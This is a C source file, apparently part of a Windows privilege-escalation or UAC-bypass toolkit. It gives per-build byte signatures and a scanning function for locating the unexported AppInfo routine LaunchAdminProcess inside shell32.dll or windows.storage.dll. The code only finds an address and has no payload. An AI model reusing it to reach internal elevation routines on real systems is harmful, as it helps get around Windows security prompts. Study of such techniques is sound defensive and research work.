
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2018
*
* TITLE: AIC.C
*
* VERSION: 2.87
*
* DATE: 17 Apr 2018
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
/*
* Byte signatures used by AipFindLaunchAdminProcess to locate the routine
* inside the scanned module. One array per group of OS build numbers; the
* build-to-signature mapping (and the module each one is searched in) is
* the switch in AipFindLaunchAdminProcess below. Sizes are taken with
* sizeof at the selection site, so the arrays must stay plain fixed-size
* arrays (not pointers).
*/

// Builds 7600 and 7601.
unsigned char LaunchAdminProcessSignature760x[] = {
0xFF, 0xF3, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x30, 0x04, 0x00, 0x00
};
// Build 9200.
unsigned char LaunchAdminProcessSignature9200[] = {
0x44, 0x89, 0x44, 0x24, 0x18, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56,
0x41, 0x57, 0x48, 0x81, 0xEC, 0xF0, 0x03, 0x00, 0x00
};
// Build 9600.
unsigned char LaunchAdminProcessSignature9600[] = {
0x44, 0x89, 0x4C, 0x24, 0x20, 0x44, 0x89, 0x44, 0x24, 0x18, 0x53, 0x56, 0x57, 0x41,
0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xEC, 0x00, 0x04, 0x00, 0x00
};
// Builds 10240 and 10586.
unsigned char LaunchAdminProcessSignature10240_10586[] = {
0x40, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x30, 0x04, 0x00, 0x00
};
// Build 14393.
unsigned char LaunchAdminProcessSignature14393[] = {
0x40, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x20, 0x04, 0x00, 0x00
};
// Builds 15063, 16299, 17134 — and the fallback for any build number the
// switch does not list (default case), so a mismatch on a newer build is
// reported as ERROR_PROC_NOT_FOUND rather than matched loosely.
unsigned char LaunchAdminProcessSignature_15063_17134[] = {
0x40, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81,
0xEC, 0x20, 0x04, 0x00, 0x00
};
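/*
* AipFindLaunchAdminProcess
*
* Purpose:
*
* Locate unexported AppInfo routine in memory by signature.
*
* Parameters:
*
* ErrorCode - receives ERROR_SUCCESS on success, ERROR_INTERNAL_ERROR when
*             the scan module cannot be mapped or its PE headers are not
*             usable, or ERROR_PROC_NOT_FOUND when the signature does not
*             occur in the module. Declared _In_ but written on every path
*             (it behaves as _Out_); must not be NULL.
*
* Return:
*
* Address of the first signature match inside the scan module, or 0 on
* failure (ErrorCode says why).
*
* Notes:
*
* Signature and target module are selected by g_ctx.dwBuildNumber. Build
* numbers not listed in the switch fall through to the newest signature;
* if that signature is absent the call fails with ERROR_PROC_NOT_FOUND
* instead of returning a guessed address. The module handle obtained via
* LoadLibraryEx is intentionally not released: the returned address is
* only meaningful while the module stays mapped.
*
*/
ULONG_PTR AipFindLaunchAdminProcess(
    _In_ PULONG ErrorCode)
{
    ULONG_PTR Address = 0;
    PBYTE Pattern = NULL, ScanBase = NULL;
    DWORD PatternSize = 0, ScanSize = 0;
    IMAGE_NT_HEADERS *NtHeaders = NULL;
    LPWSTR ScanModule = NULL;

    switch (g_ctx.dwBuildNumber) {
    case 7600:
    case 7601:
        Pattern = LaunchAdminProcessSignature760x;
        PatternSize = sizeof(LaunchAdminProcessSignature760x);
        ScanModule = SHELL32_DLL;
        break;
    case 9200:
        Pattern = LaunchAdminProcessSignature9200;
        PatternSize = sizeof(LaunchAdminProcessSignature9200);
        ScanModule = SHELL32_DLL;
        break;
    case 9600:
        Pattern = LaunchAdminProcessSignature9600;
        PatternSize = sizeof(LaunchAdminProcessSignature9600);
        ScanModule = SHELL32_DLL;
        break;
    case 10240:
    case 10586:
        Pattern = LaunchAdminProcessSignature10240_10586;
        PatternSize = sizeof(LaunchAdminProcessSignature10240_10586);
        ScanModule = WINDOWS_STORAGE_DLL;
        break;
    case 14393:
        Pattern = LaunchAdminProcessSignature14393;
        PatternSize = sizeof(LaunchAdminProcessSignature14393);
        ScanModule = WINDOWS_STORAGE_DLL;
        break;
    case 15063:
    case 16299:
    case 17134:
    default:
        // Newest known signature doubles as the fallback for unknown builds.
        Pattern = LaunchAdminProcessSignature_15063_17134;
        PatternSize = sizeof(LaunchAdminProcessSignature_15063_17134);
        ScanModule = WINDOWS_STORAGE_DLL;
        break;
    }

    // Prefer an instance that is already mapped; load only when absent.
    ScanBase = (PBYTE)GetModuleHandle(ScanModule);
    if (ScanBase == NULL) {
        // LOAD_LIBRARY_SEARCH_SYSTEM32 pins the lookup to the system
        // directory so a same-named DLL elsewhere on the search path is
        // never mapped in its place.
        ScanBase = (PBYTE)LoadLibraryEx(ScanModule, NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
    }
    if (ScanBase == NULL) {
        *ErrorCode = ERROR_INTERNAL_ERROR;
        return 0;
    }

    // RtlImageNtHeader returns NULL when the mapping has no valid PE
    // headers; without this check SizeOfImage below would be read through
    // a null pointer.
    NtHeaders = RtlImageNtHeader(ScanBase);
    if (NtHeaders == NULL) {
        *ErrorCode = ERROR_INTERNAL_ERROR;
        return 0;
    }
    if (NtHeaders->OptionalHeader.SizeOfImage <= PatternSize) {
        *ErrorCode = ERROR_INTERNAL_ERROR;
        return 0;
    }

    // Stop PatternSize bytes short of the image end so the final
    // comparison never reads beyond the mapping.
    ScanSize = NtHeaders->OptionalHeader.SizeOfImage - PatternSize;
    Address = (ULONG_PTR)supFindPattern(ScanBase, (SIZE_T)ScanSize, Pattern, (SIZE_T)PatternSize);
    if (Address == 0) {
        *ErrorCode = ERROR_PROC_NOT_FOUND;
        return 0;
    }

    *ErrorCode = ERROR_SUCCESS;
    return Address;
}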